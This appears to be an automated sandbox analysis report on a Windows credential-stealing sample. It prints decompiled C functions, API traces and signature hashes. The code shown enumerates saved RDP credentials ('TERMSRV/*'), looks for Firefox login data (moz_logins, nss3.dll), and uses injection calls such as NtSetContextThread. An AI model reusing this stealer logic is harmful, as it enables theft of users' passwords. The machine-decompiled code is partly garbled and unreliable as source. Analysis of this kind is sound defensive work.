                                                                        • lstrcmpA.KERNEL32(table,?,00000000,moz_logins,?), ref: 0040C136
                                                                          • Part of subcall function 0040B69A: StrStrIA.SHLWAPI(?,() ), ref: 0040B6AA
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: lstrcmplstrcmpi
                                                                        • String ID: moz_logins$table
                                                                        • API String ID: 3524194181-1174185386
                                                                        • Opcode ID: d03f47c64e517c75710b6f96bc8a4cf34e83e1d624fd46c84193a1899ce28047
                                                                        • Instruction ID: 9aaa2a27647da64927c3ca6f9125f509d968329839c130476f5429ed0db09bc1
                                                                        • Opcode Fuzzy Hash: d03f47c64e517c75710b6f96bc8a4cf34e83e1d624fd46c84193a1899ce28047
                                                                        • Instruction Fuzzy Hash: 8831D47280020EFADF219F90CC85EDE7B79AB05324F104366E520F51E1DB399B94EB99
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 85%
                                                                        			E00401A09(void* __ecx, void* __edx, intOrPtr _a4) {
                                                                        				void* _v8;
                                                                        				intOrPtr _v12;
                                                                        				intOrPtr _v16;
                                                                        				intOrPtr _v20;
                                                                        				char _v280;
                                                                        				signed int _v284;
                                                                        				signed int _t27;
                                                                        				void* _t29;
                                                                        				signed int _t44;
                                                                        				signed int _t46;
                                                                        				void* _t48;
                                                                        				void* _t49;
                                                                        
                                                                        				_t49 = __edx;
                                                                        				_t48 = __ecx;
                                                                        				_t27 = GetTickCount();
                                                                        				asm("rol eax, 0xb");
                                                                        				_v284 =  !_t27;
                                                                        				_t46 = 0;
                                                                        				_t29 =  &_v8;
                                                                        				_push(_t29);
                                                                        				_push(_a4);
                                                                        				L00410DBE();
                                                                        				if(_t29 >= 0) {
                                                                        					_v16 = E0040106A(_t29, _t49, _a4);
                                                                        					_t29 = GlobalLock(_v8);
                                                                        					_t51 = _t29;
                                                                        					if(_t29 != 0) {
                                                                        						_v20 = _t29;
                                                                        						_v12 = E004017EC(_v16);
                                                                        						E00401823(_v20, _v12, _v16);
                                                                        						GlobalUnlock(_v8);
                                                                        						E0040185C(_t48, _t51,  &_v280,  &_v284, 4);
                                                                        						E004012C7(E004018C7( &_v280, _v12, _v16), _t49, _a4);
                                                                        						_t44 = E0040149B(_a4,  &_v284, 4);
                                                                        						_t46 = _t44 & E0040149B(_a4, _v12, _v16);
                                                                        						_t29 = E004017D5(_v12);
                                                                        					}
                                                                        				}
                                                                        				E0040125A(_t29, _t49, _a4);
                                                                        				return _t46;
                                                                        			}

                                                                        APIs
                                                                        • GetTickCount.KERNEL32 ref: 00401A13
                                                                        • GetHGlobalFromStream.OLE32(?,?,?,?,00410565,?,?,?,?,Oguqcogtkec,?,?,?,?,00000000,?), ref: 00401A2C
                                                                        • GlobalLock.KERNEL32 ref: 00401A47
                                                                          • Part of subcall function 004017EC: LocalAlloc.KERNEL32(00000040,-00000080,?,00402BA6,00000000), ref: 004017FA
                                                                        • GlobalUnlock.KERNEL32(?,?,?,00000000,00000000,?,?,?,?,?,?,00410565,?,?,?,?), ref: 00401A6F
                                                                          • Part of subcall function 004017D5: LocalFree.KERNEL32(00000000,?,00402BF8), ref: 004017E1
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Global$Local$AllocCountFreeFromLockStreamTickUnlock
                                                                        • String ID:
                                                                        • API String ID: 1884134869-0
                                                                        • Opcode ID: 9ec4ad7614db6a7481ded8012edae2c9129aef1efae498da208f41ebf576815f
                                                                        • Instruction ID: 1816704bb606bad1ac1aad56d21282bb97894661860074deb7c63e9bdd074128
                                                                        • Opcode Fuzzy Hash: 9ec4ad7614db6a7481ded8012edae2c9129aef1efae498da208f41ebf576815f
                                                                        • Instruction Fuzzy Hash: 7721797690010CBADF01AFA1DC429EDBFB9EF04344F0041BAB615B50B1EB799B959F58
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E0040CC8E(void* __eflags, intOrPtr _a4, intOrPtr _a8, char* _a12, intOrPtr _a16, intOrPtr _a20) {
                                                                        				intOrPtr _v8;
                                                                        				int _v12;
                                                                        				char* _t29;
                                                                        				char* _t32;
                                                                        
                                                                        				E00401486(_a4, 0xbeef0000);
                                                                        				E004014E8(_a4, _a8);
                                                                        				E004014E8(_a4, _a12);
                                                                        				E004014BC(_a4, _a16, _a20);
                                                                        				_t29 = StrStrIA(_a12, 0x415f85);
                                                                        				if(_t29 == 0) {
                                                                        					_v12 = lstrlenA("TERMSRV/");
                                                                        					_t32 = StrStrIA(_a12, "TERMSRV/");
                                                                        					if(_t32 != 0) {
                                                                        						_a12 = _t32;
                                                                        					}
                                                                        					_t29 = E0040370F(_t32, _a12);
                                                                        					if(_t29 != 0xffffffff) {
                                                                        						_v8 = _t29;
                                                                        						E00401486(_a4, 0xbeef0001);
                                                                        						E004014E8(_a4, _a8);
                                                                        						E00401486(_a4, _v8);
                                                                        						return E004014BC(_a4, _a16, _a20);
                                                                        					}
                                                                        				}
                                                                        				return _t29;
                                                                        			}

                                                                        APIs
                                                                          • Part of subcall function 004014E8: lstrlenA.KERNEL32(00000000), ref: 004014F4
                                                                        • StrStrIA.SHLWAPI(?,00415F85,?,?,?,?,BEEF0000), ref: 0040CCCD
                                                                        • lstrlenA.KERNEL32(TERMSRV/,?,00415F85,?,?,?,?,BEEF0000), ref: 0040CCDB
                                                                        • StrStrIA.SHLWAPI(?,TERMSRV/,TERMSRV/,?,00415F85,?,?,?,?,BEEF0000), ref: 0040CCEB
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: lstrlen
                                                                        • String ID: TERMSRV/
                                                                        • API String ID: 1659193697-3001602198
                                                                        • Opcode ID: 627aaf26f0225197c5aa5c5c924a23d4e09da5c46d72da40a325893888861a00
                                                                        • Instruction ID: a6930c2e67e34cc212e01140ebbd4d9fa3ed10fe33d805293db90992e34d82a9
                                                                        • Opcode Fuzzy Hash: 627aaf26f0225197c5aa5c5c924a23d4e09da5c46d72da40a325893888861a00
                                                                        • Instruction Fuzzy Hash: 4911FA71450109FFCF126FA1CC829DD3E62AF10354F10863ABD14741F1D77A8AB2AB98
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E0040CC8E(void* __eflags, intOrPtr _a4, intOrPtr _a8, char* _a12, intOrPtr _a16, intOrPtr _a20) {
                                                                        				intOrPtr _v8;
                                                                        				int _v12;
                                                                        				char* _t29;
                                                                        				char* _t32;
                                                                        
                                                                        				E00401486(_a4, 0xbeef0000);
                                                                        				E004014E8(_a4, _a8);
                                                                        				E004014E8(_a4, _a12);
                                                                        				E004014BC(_a4, _a16, _a20);
                                                                        				_t29 = StrStrIA(_a12, 0x415f85);
                                                                        				if(_t29 == 0) {
                                                                        					_v12 = lstrlenA("TERMSRV/");
                                                                        					_t32 = StrStrIA(_a12, "TERMSRV/");
                                                                        					if(_t32 != 0) {
                                                                        						_a12 = _t32;
                                                                        					}
                                                                        					_t29 = E0040370F(_t32, _a12);
                                                                        					if(_t29 != 0xffffffff) {
                                                                        						_v8 = _t29;
                                                                        						E00401486(_a4, 0xbeef0001);
                                                                        						E004014E8(_a4, _a8);
                                                                        						E00401486(_a4, _v8);
                                                                        						return E004014BC(_a4, _a16, _a20);
                                                                        					}
                                                                        				}
                                                                        				return _t29;
                                                                        			}








                                                                        APIs
                                                                          • Part of subcall function 004014E8: lstrlenA.KERNEL32(00000000), ref: 004014F4
                                                                        • StrStrIA.SHLWAPI(?,00415F85,?,?,?,?,BEEF0000), ref: 0040CCCD
                                                                        • lstrlenA.KERNEL32(TERMSRV/,?,00415F85,?,?,?,?,BEEF0000), ref: 0040CCDB
                                                                        • StrStrIA.SHLWAPI(?,TERMSRV/,TERMSRV/,?,00415F85,?,?,?,?,BEEF0000), ref: 0040CCEB
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.657098932.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: lstrlen
                                                                        • String ID: TERMSRV/
                                                                        • API String ID: 1659193697-3001602198
                                                                        • Opcode ID: 627aaf26f0225197c5aa5c5c924a23d4e09da5c46d72da40a325893888861a00
                                                                        • Instruction ID: a6930c2e67e34cc212e01140ebbd4d9fa3ed10fe33d805293db90992e34d82a9
                                                                        • Opcode Fuzzy Hash: 627aaf26f0225197c5aa5c5c924a23d4e09da5c46d72da40a325893888861a00
                                                                        • Instruction Fuzzy Hash: 4911FA71450109FFCF126FA1CC829DD3E62AF10354F10863ABD14741F1D77A8AB2AB98
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00401D69(CHAR* _a4, CHAR* _a8) {
                                                                        				int _t11;
                                                                        				CHAR* _t21;
                                                                        
                                                                        				if(_a4 == 0) {
                                                                        					_a4 = 0x4140dc;
                                                                        				}
                                                                        				if(_a8 == 0) {
                                                                        					_a8 = 0x4140dc;
                                                                        				}
                                                                        				_t11 = lstrlenA(_a4);
                                                                        				_t21 = E004017EC(_t11 + lstrlenA(_a8) + 1);
                                                                        				lstrcpyA(_t21, _a4);
                                                                        				lstrcatA(_t21, _a8);
                                                                        				if(_a4 != 0x4140dc) {
                                                                        					E004017D5(_a4);
                                                                        				}
                                                                        				return _t21;
                                                                        			}






                                                                        APIs
                                                                        • lstrlenA.KERNEL32(?,?,?,004020B8,00000000,?,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,004140DA,00410BE4,00000000,?,00000FFF,00000000,00000000,00000000,00000000), ref: 00401D8A
                                                                        • lstrlenA.KERNEL32(?,?,?,?,004020B8,00000000,?,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,004140DA,00410BE4,00000000,?,00000FFF,00000000,00000000,00000000), ref: 00401D94
                                                                        • lstrcpyA.KERNEL32(00000000,?,00000000,?,?,?,?,004020B8,00000000,?,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,004140DA,00410BE4,00000000,?,00000FFF), ref: 00401DA8
                                                                        • lstrcatA.KERNEL32(00000000,?,00000000,?,00000000,?,?,?,?,004020B8,00000000,?,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,004140DA,00410BE4,00000000), ref: 00401DB1
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: lstrlen$lstrcatlstrcpy
                                                                        • String ID:
                                                                        • API String ID: 2414487701-0
                                                                        • Opcode ID: 6cc6e09272474b3cb8dce6ba2176f2269a61a8de9243c3ed8c0684545af6c42b
                                                                        • Instruction ID: 9ae4c9ae6809e1f747658f89b899b66aaa74484b7ddbf5727539b292c185063a
                                                                        • Opcode Fuzzy Hash: 6cc6e09272474b3cb8dce6ba2176f2269a61a8de9243c3ed8c0684545af6c42b
                                                                        • Instruction Fuzzy Hash: F3F03075100208BFCF112F62CC81ADE3EA8AF1535CF00C13AB9051A262E7BDC9D48F88
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00401D15(CHAR* _a4, CHAR* _a8) {
                                                                        				int _t9;
                                                                        				CHAR* _t18;
                                                                        
                                                                        				if(_a4 == 0) {
                                                                        					_a4 = 0x4140dc;
                                                                        				}
                                                                        				if(_a8 == 0) {
                                                                        					_a8 = 0x4140dc;
                                                                        				}
                                                                        				_t9 = lstrlenA(_a4);
                                                                        				_t18 = E004017EC(_t9 + lstrlenA(_a8) + 1);
                                                                        				lstrcpyA(_t18, _a4);
                                                                        				lstrcatA(_t18, _a8);
                                                                        				return _t18;
                                                                        			}






                                                                        APIs
                                                                        • lstrlenA.KERNEL32(?,?,?,004020A1,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,004140DA,00410BE4,00000000,?,00000FFF,00000000,00000000,00000000,00000000), ref: 00401D36
                                                                        • lstrlenA.KERNEL32(?,?,?,?,004020A1,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,004140DA,00410BE4,00000000,?,00000FFF,00000000,00000000,00000000,00000000), ref: 00401D40
                                                                        • lstrcpyA.KERNEL32(00000000,?,00000000,?,?,?,?,004020A1,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,004140DA,00410BE4,00000000,?,00000FFF,00000000,00000000), ref: 00401D54
                                                                        • lstrcatA.KERNEL32(00000000,?,00000000,?,00000000,?,?,?,?,004020A1,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,004140DA,00410BE4,00000000,?,00000FFF), ref: 00401D5D
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: lstrlen$lstrcatlstrcpy
                                                                        • String ID:
                                                                        • API String ID: 2414487701-0
                                                                        • Opcode ID: ed04cc0a6ecd02db3481c5f24da25771bf7219ba3f246894e7468dd910f212c0
                                                                        • Instruction ID: b07956f7e4c4c3b071cedfc2c00158bbb0f467af7b0f96d575d83a1108638678
                                                                        • Opcode Fuzzy Hash: ed04cc0a6ecd02db3481c5f24da25771bf7219ba3f246894e7468dd910f212c0
                                                                        • Instruction Fuzzy Hash: 23F03075100208BFDF012FA2DC81ADE3B98AF1435CF00D52AB9151A252E7BDC9D48F98
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • lstrlenA.KERNEL32(?), ref: 00408ED8
                                                                        • SetCurrentDirectoryA.KERNEL32(?,?), ref: 00408EF9
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CurrentDirectorylstrlen
                                                                        • String ID: nss3.dll
                                                                        • API String ID: 2713697268-2492180550
                                                                        • Opcode ID: 3f80516e9565581d8ce7fddc40a23c3c96676ac7c463f2c8aad417b34e152649
                                                                        • Instruction ID: 8c4d155ad2526371845bb933d3f11b8da1162bc186a42e2439c8c001b69ebc86
                                                                        • Opcode Fuzzy Hash: 3f80516e9565581d8ce7fddc40a23c3c96676ac7c463f2c8aad417b34e152649
                                                                        • Instruction Fuzzy Hash: EA115E71510A01EBDB103F34ED4ABC63FA2EB94354F14803AF441A42A1DB7A55E0CA9D
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 16%
                                                                        			E0040CD3F(intOrPtr _a4) {
                                                                        				void* _v8;
                                                                        				char _v12;
                                                                        				void* _t17;
                                                                        				intOrPtr* _t23;
                                                                        				void* _t25;
                                                                        
                                                                        				if( *0x4143f5 != 0 &&  *0x4143f1 != 0 &&  *0x41442d != 0) {
                                                                        					_v8 = 0;
                                                                        					_v12 = 0;
                                                                        					_t17 =  *0x4143f1("TERMSRV/*", 0,  &_v12,  &_v8);
                                                                        					if(_t17 != 0 && _v12 != 0 && _v8 != 0) {
                                                                        						_t23 = _v8;
                                                                        						while(_v12 != 0 &&  *_t23 != 0) {
                                                                        							E0040CC8E(__eflags, _a4,  *((intOrPtr*)( *_t23 + 0x30)),  *((intOrPtr*)( *_t23 + 8)),  *((intOrPtr*)(_t24 + 0x1c)),  *((intOrPtr*)(_t24 + 0x18)));
                                                                        							_t25 = _t23;
                                                                        							_v12 = _v12 - 1;
                                                                        							_t23 = _t25 + 4;
                                                                        							__eflags = _t23;
                                                                        						}
                                                                        						return  *0x4143f5(_v8);
                                                                        					}
                                                                        				}
                                                                        				return _t17;
                                                                        			}









                                                                        APIs
                                                                        • CredEnumerateA.ADVAPI32(TERMSRV/*,00000000,00000000,00000000), ref: 0040CD7E
                                                                        • CredFree.ADVAPI32(00000000), ref: 0040CDC5
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.657098932.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Cred$EnumerateFree
                                                                        • String ID: TERMSRV/*
                                                                        • API String ID: 3403564193-275249402
                                                                        • Opcode ID: d0e299ef229a2a28e4c5329bb093eb38bbe2de71871c04fe3f67b1ad540f1a29
                                                                        • Instruction ID: a372621de2bce721beb090cfe78feac401f7af25901f3d57f49ef118639a82fb
                                                                        • Opcode Fuzzy Hash: d0e299ef229a2a28e4c5329bb093eb38bbe2de71871c04fe3f67b1ad540f1a29
                                                                        • Instruction Fuzzy Hash: FF115B72910609FBDF218F84D8C9BDABBB4EF04305F14427BE851721E0C7789A84DB9A
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Executed Functions

                                                                        APIs
                                                                        • NtProtectVirtualMemory.NTDLL(000000FF,?,?,00000040,?,04B20233,00000000,00000000,00000000,00000000,00000000,00000100), ref: 04B214D4
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.690170836.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: false
                                                                        Similarity
                                                                        • API ID: MemoryProtectVirtual
                                                                        • String ID:
                                                                        • API String ID: 2706961497-0
                                                                        • Opcode ID: 68f1300b4169501a5149b5bf366d46f158dcaf459f2b63602d3b4dfb240e3762
                                                                        • Instruction ID: ec88cb332b9bbe83d3615cc40d4e249eff4afafb5aa53f145f1a2d49264aa390
                                                                        • Opcode Fuzzy Hash: 68f1300b4169501a5149b5bf366d46f158dcaf459f2b63602d3b4dfb240e3762
                                                                        • Instruction Fuzzy Hash: 3C314FB19147529FDB24CF2CD9C4B15B7E0EB45224F04C2E9D5AA8B2D7C234E442C766
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • NtSetContextThread.NTDLL(00000000,?), ref: 04B20A15
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.690170836.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: false
                                                                        Similarity
                                                                        • API ID: ContextThread
                                                                        • String ID:
                                                                        • API String ID: 1591575202-0
                                                                        • Opcode ID: 614cbf790dd754109b8ca54cbfdcb230ac824af459207037d42871c7b1f4fd19
                                                                        • Instruction ID: e8465886ab92a751361ea666e128ab925493ed5c64d2dc17d4c32054c7ddd308
                                                                        • Opcode Fuzzy Hash: 614cbf790dd754109b8ca54cbfdcb230ac824af459207037d42871c7b1f4fd19
                                                                        • Instruction Fuzzy Hash: 1F113421504275BFEB14BF7887446AA7B75FF47304F5486D5D52E06022EA20B843DB61
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 41%
                                                                        			E0041C2B3(void* __eax, void* __ebx, void* __esi) {
                                                                        				void* _t16;
                                                                        				void* _t18;
                                                                        				signed char _t20;
                                                                        				void* _t21;
                                                                        				void* _t22;
                                                                        				void* _t23;
                                                                        				intOrPtr* _t24;
                                                                        				void* _t25;
                                                                        				void* _t28;
                                                                        				int _t37;
                                                                        				int _t39;
                                                                        				signed int _t40;
                                                                        				int _t41;
                                                                        				void* _t46;
                                                                        				void* _t49;
                                                                        				char* _t50;
                                                                        				signed int _t51;
                                                                        				signed int _t55;
                                                                        				void* _t62;
                                                                        
                                                                        				_pop(_t41);
                                                                        				_t37 = _t41;
                                                                        				_push(0);
                                                                        				_push(0);
                                                                        				_push(0);
                                                                        				 *_t50 = 0x48;
                                                                        				asm("paddw xmm2, xmm1");
                                                                        				 *(_t50 + 1) = 0x65;
                                                                        				_push(__eax);
                                                                        				_pop(_t16);
                                                                        				 *((char*)(_t50 + 2)) = 0x61;
                                                                        				 *((char*)(_t50 + 3)) = 0x70;
                                                                        				_t18 = _t16;
                                                                        				 *((char*)(_t50 + 4)) = 0x43;
                                                                        				 *((char*)(_t50 + 5)) = 0x72;
                                                                        				_t20 = _t18;
                                                                        				 *((char*)(_t50 + 6)) = 0x65;
                                                                        				 *((char*)(_t50 + 7)) = 0x61;
                                                                        				_push(__esi);
                                                                        				_pop(_t46);
                                                                        				 *((char*)(_t50 + 8)) = 0x74;
                                                                        				_t51 = _t50 + 1;
                                                                        				_t21 = _t20 & 0x00000008;
                                                                        				if(_t21 == 0) {
                                                                        					asm("cld");
                                                                        					_pop(ds);
                                                                        					 *_t21 = _t21 +  *_t21;
                                                                        					__eflags =  *_t21;
                                                                        					_t22 = memcpy(_t21, _t46, _t37);
                                                                        					_t51 = _t51 + 0xc;
                                                                        					_t41 = _t46 + _t37 + _t37;
                                                                        					_t39 = _t37;
                                                                        					do {
                                                                        						_t22 = E0041C3C0(_t22, _t39, _t46, 0);
                                                                        					} while (__eflags >= 0);
                                                                        					goto __eax;
                                                                        				}
                                                                        				_t55 = _t21 << 1;
                                                                        				 *((char*)(_t51 + 9)) = 0x65;
                                                                        				 *(_t49 - 0x70) =  *(_t49 - 0x70) | _t51;
                                                                        				_t40 = _t51;
                                                                        				L9();
                                                                        				 *_t51 =  *_t51 + 0x44fff; // executed
                                                                        				_t28 = HeapCreate(1, 0, 0); // executed
                                                                        				 *(_t49 + 8) = _t28;
                                                                        				_t39 = _t41;
                                                                        				_t23 = L0041C326(__ebx, _t39, _t41, _t46, _t55, _t62);
                                                                        				_push(_t23);
                                                                        				_t24 = _t23 - 1;
                                                                        				asm("popad");
                                                                        				if(_t24 >= 0) {
                                                                        					asm("insb");
                                                                        					asm("insb");
                                                                        					asm("outsd");
                                                                        					asm("arpl [eax], ax");
                                                                        					do {
                                                                        						asm("lodsd");
                                                                        					} while (_t24 == 0 ||  *_t24 != 0xffffffff83ec8b55 ||  *((intOrPtr*)(_t24 + 4)) != 0xffffffff8d560cec);
                                                                        					 *_t51 =  *_t51 + 0x44ffe;
                                                                        					_t25 =  *_t24(_t51, _t39, _t40, 2, _t51, 0, 0, 0); // executed
                                                                        					return _t25;
                                                                        				}
                                                                        				return _t24;
                                                                        			}


                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.689859187.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000A.00000002.689855403.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 0000000A.00000002.689873308.0000000000421000.00000020.00020000.sdmp
                                                                        • Associated: 0000000A.00000002.689876932.0000000000422000.00000004.00020000.sdmp
                                                                        • Associated: 0000000A.00000002.689880429.000000000042A000.00000004.00020000.sdmp
                                                                        • Associated: 0000000A.00000002.689883984.000000000042B000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: CreateHeap
                                                                        • String ID: C$ZBH$a$a$e$e$e$p$r$t
                                                                        • API String ID: 10892065-806109700
                                                                        • Opcode ID: 1e4dcb0d92532099e8bfcde6bd255666af820a14ccddb95377bfc1d5073683db
                                                                        • Instruction ID: 58e82dbdb3658900729ccf9ba076fd16bbbb39d88dae26d1e35245091ceddc53
                                                                        • Opcode Fuzzy Hash: 1e4dcb0d92532099e8bfcde6bd255666af820a14ccddb95377bfc1d5073683db
                                                                        • Instruction Fuzzy Hash: AC01926018D7C069F351923C8815B4BAEC91BD2704F28C84EB6D8E22C2D6F98485836F
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 40%
                                                                        			E0041C267(void* __ebx, void* __edx, void* __esi) {
                                                                        				void* _t14;
                                                                        				void* _t16;
                                                                        				void* _t17;
                                                                        				void* _t18;
                                                                        				intOrPtr* _t19;
                                                                        				void* _t20;
                                                                        				void* _t21;
                                                                        				void* _t60;
                                                                        				void* _t61;
                                                                        				void* _t63;
                                                                        				signed int _t64;
                                                                        				void* _t65;
                                                                        				void* _t67;
                                                                        				void* _t84;
                                                                        				signed int _t87;
                                                                        				void* _t94;
                                                                        
                                                                        				_t63 = __edx;
                                                                        				_t49 = __ebx;
                                                                        				_pop(_t60);
                                                                        				L0041C26A(_t14, __ebx, _t60, __esi, _t94);
                                                                        				_t16 =  *((intOrPtr*)(__ebx + 0x68))();
                                                                        				asm("gs insb");
                                                                        				asm("insb");
                                                                        				_pop(_t65);
                                                                        				_t67 = __esi - 1;
                                                                        				asm("outsd");
                                                                        				if(_t67 == 0) {
                                                                        					 *(_t84 - 0x70) =  *(_t84 - 0x70) | _t87;
                                                                        					_t64 = _t87;
                                                                        					L14();
                                                                        					 *_t87 =  *_t87 + 0x44fff; // executed
                                                                        					_t17 = HeapCreate(1, 0, 0); // executed
                                                                        					 *(_t84 + 8) = _t17;
                                                                        					_t61 = _t65;
                                                                        					_t18 = L0041C326(_t49, _t61, _t65, _t67, __eflags, _t94);
                                                                        					_push(_t18);
                                                                        					_t19 = _t18 - 1;
                                                                        					__eflags = _t19;
                                                                        					asm("popad");
                                                                        					if(_t19 >= 0) {
                                                                        						asm("insb");
                                                                        						asm("insb");
                                                                        						asm("outsd");
                                                                        						asm("arpl [eax], ax");
                                                                        						__eflags =  &__imp___CIcos;
                                                                        						goto L15;
                                                                        						do {
                                                                        							do {
                                                                        								do {
                                                                        									L15:
                                                                        									asm("lodsd");
                                                                        									__eflags = _t19;
                                                                        								} while (_t19 == 0);
                                                                        								__eflags =  *_t19 - 0xffffffff83ec8b55;
                                                                        							} while ( *_t19 != 0xffffffff83ec8b55);
                                                                        							__eflags =  *((intOrPtr*)(_t19 + 4)) - 0xffffffff8d560cec;
                                                                        						} while ( *((intOrPtr*)(_t19 + 4)) != 0xffffffff8d560cec);
                                                                        						 *_t87 =  *_t87 + 0x44ffe;
                                                                        						__eflags =  *_t87;
                                                                        						_t20 =  *_t19(_t87, _t61, _t64, 2, _t87, 0, 0, 0); // executed
                                                                        						return _t20;
                                                                        					}
                                                                        					return _t19;
                                                                        				} else {
                                                                        					asm("o16 jns 0x4c");
                                                                        					asm("arpl [edi+0x6e], bp");
                                                                        					 *((intOrPtr*)(_t16 - 1)) =  *((intOrPtr*)(_t16 - 1)) + __ebx;
                                                                        					_t21 = _t65;
                                                                        					_push( *((intOrPtr*)(_t84 + 0x52)));
                                                                        				}
                                                                        			}


                                                                        APIs
                                                                        • Shell_NotifyIconW.SHELL32(00000002,?), ref: 0041C2AB
                                                                        • HeapCreate.KERNELBASE ref: 0041C31D
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.689859187.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000A.00000002.689855403.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 0000000A.00000002.689873308.0000000000421000.00000020.00020000.sdmp
                                                                        • Associated: 0000000A.00000002.689876932.0000000000422000.00000004.00020000.sdmp
                                                                        • Associated: 0000000A.00000002.689880429.000000000042A000.00000004.00020000.sdmp
                                                                        • Associated: 0000000A.00000002.689883984.000000000042B000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: CreateHeapIconNotifyShell_
                                                                        • String ID: KERNEL32$ZBH$e
                                                                        • API String ID: 2522922933-1899473809
                                                                        • Opcode ID: 7427d51aef7b1708450cdbeb13e5ddfffb8de5b566c4ce4102e31af8384c4493
                                                                        • Instruction ID: 521c14249353ba93ce19dc54aff6b235836c95a5453462fa8e3fff2d8716eeda
                                                                        • Opcode Fuzzy Hash: 7427d51aef7b1708450cdbeb13e5ddfffb8de5b566c4ce4102e31af8384c4493
                                                                        • Instruction Fuzzy Hash: 34316EB2558A242EF620A1B42C65AEAB74CDB53364F61570BFE90D21C1CA2446C381FE
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • GetExitCodeProcess.KERNELBASE(?,?), ref: 04B20AA9
                                                                        • TerminateProcess.KERNELBASE(000000FF,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,04B21A60), ref: 04B20CDB
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.690170836.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: false
                                                                        Similarity
                                                                        • API ID: Process$CodeExitTerminate
                                                                        • String ID: ZO$mmandLineW
                                                                        • API String ID: 1523012911-2333973816
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • CreateProcessW.KERNELBASE(?,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 04B2089C
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.690170836.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: false
                                                                        Similarity
                                                                        • API ID: CreateProcess
                                                                        • String ID: ZO$mmandLineW
                                                                        • API String ID: 963392458-2333973816
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.690170836.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: false
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: MOC$csm
                                                                        • API String ID: 0-1389381023
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 59%
